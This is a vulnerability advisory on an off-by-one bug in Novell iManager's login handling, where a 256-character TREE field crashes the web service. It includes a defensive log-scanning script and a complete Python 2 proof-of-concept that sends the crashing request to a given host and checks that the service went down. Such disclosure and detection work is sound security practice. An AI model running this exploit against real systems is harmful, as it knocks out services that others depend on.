Novell iManager Over-long TREE Field Off-by-One Denial of Service Vulnerability

Cause
Boundary condition error
Severity

 
Affected systems
Novell iManager 2.7.3
Novell iManager 2.7.2
Novell iManager 2.7.1
Novell iManager 2.5
Novell iManager 2.0.2
Novell iManager 2.0
Novell iManager 1.5
Novell iManager 2.7.3 FTF2
Novell iManager 2.7.0
Novell iManager 2.6.0
 
Unaffected systems
Novell iManager 2.7.4
Novell iManager 2.7.3 FTF4
 
Impact
A remote attacker can exploit this vulnerability to crash the application.
 
Attack prerequisites
The attacker must be able to reach Novell iManager.
 
Vulnerability details
Novell iManager is a web-based application that can be used from wireless devices to manage and configure Novell eDirectory objects.
The code responsible for handling iManager logins contains an off-by-one error; a remote, unauthenticated user can crash the iManager web service.
All three input fields on the iManager login page are defined with a maximum length of 256 bytes, limiting the number of characters each field can accept. However, if a login request sent to the web server contains a TREE field that is exactly 256 characters long, the iManager Tomcat web server crashes, making the application unavailable.
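The boundary the advisory describes can be checked on the defender's side. The following is an added example, not code from the advisory or from Novell: it parses login POST bodies to /nps/servlet/webacc (the selector and the "tree" field name come from the advisory) and reports any login field whose URL-decoded value reaches the 256-character trigger length. The access-log line format it scans is constructed for the example.

```python
from urllib.parse import parse_qs

# Selector and field names from the advisory; the log format below is constructed.
LOGIN_SELECTOR = "/nps/servlet/webacc"
LOGIN_FIELDS = ("tree", "username", "password")
# The login page declares maxlength=256; a 256-character TREE value is the crash trigger,
# so a value of that length (or longer) is what a monitoring rule should flag.
TRIGGER_LEN = 256


def oversized_fields(body, limit=TRIGGER_LEN, fields=LOGIN_FIELDS):
    """Return {field: decoded_length} for each login field whose value reaches `limit`.

    Lengths are measured after URL decoding, so percent-encoded padding
    (e.g. "%41" for "A") is counted the way the server will see it.
    """
    params = parse_qs(body, keep_blank_values=True)
    hits = {}
    for name in fields:
        for value in params.get(name, []):
            if len(value) >= limit:
                hits[name] = max(hits.get(name, 0), len(value))
    return hits


def scan_access_log(lines):
    """Constructed log format: '<client> <method> <path> <urlencoded-body>'.

    Returns a list of (client, {field: length}) for login POSTs that carry
    an over-long login field; non-login and non-POST lines are ignored.
    """
    alerts = []
    for line in lines:
        try:
            client, method, path, body = line.split(" ", 3)
        except ValueError:
            continue  # malformed line, skip it
        if method != "POST" or path != LOGIN_SELECTOR:
            continue
        hits = oversized_fields(body)
        if hits:
            alerts.append((client, hits))
    return alerts


# Constructed sample: a normal login, a 255-character TREE (within the declared
# limit), a 256-character TREE (the trigger length), and an unrelated GET.
SAMPLE_LOG = [
    "10.0.0.5 POST /nps/servlet/webacc rank=primary&DoLogin=true&username=admin&password=x&tree=CORP",
    "10.0.0.9 POST /nps/servlet/webacc rank=primary&DoLogin=true&username=admin&password=x&tree=" + "A" * 255,
    "10.0.0.7 POST /nps/servlet/webacc rank=primary&DoLogin=true&username=admin&password=x&tree=" + "A" * 256,
    "10.0.0.7 GET /nps/servlet/webacc -",
]
```

Running `scan_access_log(SAMPLE_LOG)` reports only the 10.0.0.7 POST with a 256-character TREE value.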
 
Test method
#Usage: $ python poc.py <iManager_IP> <iManager_Port>
#E.g:  $ python poc.py 192.168.0.1 48080
#Python 2 script: it relies on the httplib module and print statements.
import socket
import sys
import time
import httplib

def server_uses_SSL(host, port):
    #Try to determine if the server is using HTTP over SSL or not.
    headers = {'User-Agent': 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)',
               'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
               'Accept-Language': 'en-us,en;q=0.5',
               'Accept-Charset': 'ISO-8859-1,utf-8;q=0.7,*;q=0.7',
               'Connection': 'close'}
    using_ssl = True
    conn = httplib.HTTPSConnection(host, port)
    try:
        conn.request('GET', '/nps/servlet/webacc', headers=headers)
        response = conn.getresponse()
    except socket.sslerror:
        #The TLS handshake failed, so the port is speaking plain HTTP.
        using_ssl = False
    finally:
        conn.close()
    return using_ssl

def post_urlencoded_data(host, port, selector, body, use_ssl, get_resp=True):
    headers = {'User-Agent': 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)',
               'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
               'Accept-Language': 'en-us,en;q=0.5',
               'Accept-Charset': 'ISO-8859-1,utf-8;q=0.7,*;q=0.7',
               'Referer': 'http://%s:%s%s' % (host, port, '/nps/servlet/webacc'),
               'Content-Type': 'application/x-www-form-urlencoded',
               'Content-Length': str(len(body)),
               'Connection': 'close'}
    if use_ssl:
        conn = httplib.HTTPSConnection(host, port)
    else:
        conn = httplib.HTTPConnection(host, port)
    conn.request('POST', selector, body, headers)
    html = ''
    #This flag allows me to avoid keeping waiting for a server response in the last step, when the webserver is crashed
    if get_resp:
        response = conn.getresponse()
        html = response.read()
    conn.close()
    return html

def getPostParameters():
    #The login form fields; the tree field is filled with exactly 256 characters.
    params  = 'rank=primary&DoLogin=true&forceMaster=false'
    params += '&username=admin&password=mipass&tree=%s&Entrada.x=27&Entrada.y=13' % ('A' * 256)
    return params

def main():
    host = sys.argv[1]
    port = int(sys.argv[2])
    #Determine if the server uses plain HTTP (iManager Workstation) or HTTPS (iManager Server)
    uses_ssl = server_uses_SSL(host, port)
    if uses_ssl:
        print '(+) The server uses HTTP over SSL. Guessed target: iManager Server.'
    else:
        print '(+) The server uses plain HTTP. Guessed target: iManager Workstation.'
    print '(+) Sending login request with 256-character long TREE field...'
    post_urlencoded_data(host, port, '/nps/servlet/webacc', getPostParameters(), uses_ssl, False)
    print '(+) Malicious request successfully sent.'
    #Wait 10 seconds and try to connect again to iManager, to check if it's down
    print '(+) Waiting 10 seconds before trying to reconnect to iManager...'
    time.sleep(10)
    try:
        print '(+) Trying to reconnect...'
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((host, port))
        s.close()
        print '(!) Something went wrong. Novell iManager is still alive.'
    except socket.error:
        print '(*) Attack successful. Novell iManager is down.'

if __name__ == '__main__':
    main()
 
Vendor solution
No detailed solution is currently available:
http://www.novell.com/products/consoles/imanager/features.html
 
Credit
Francisco Falcon from Core Security Technologies
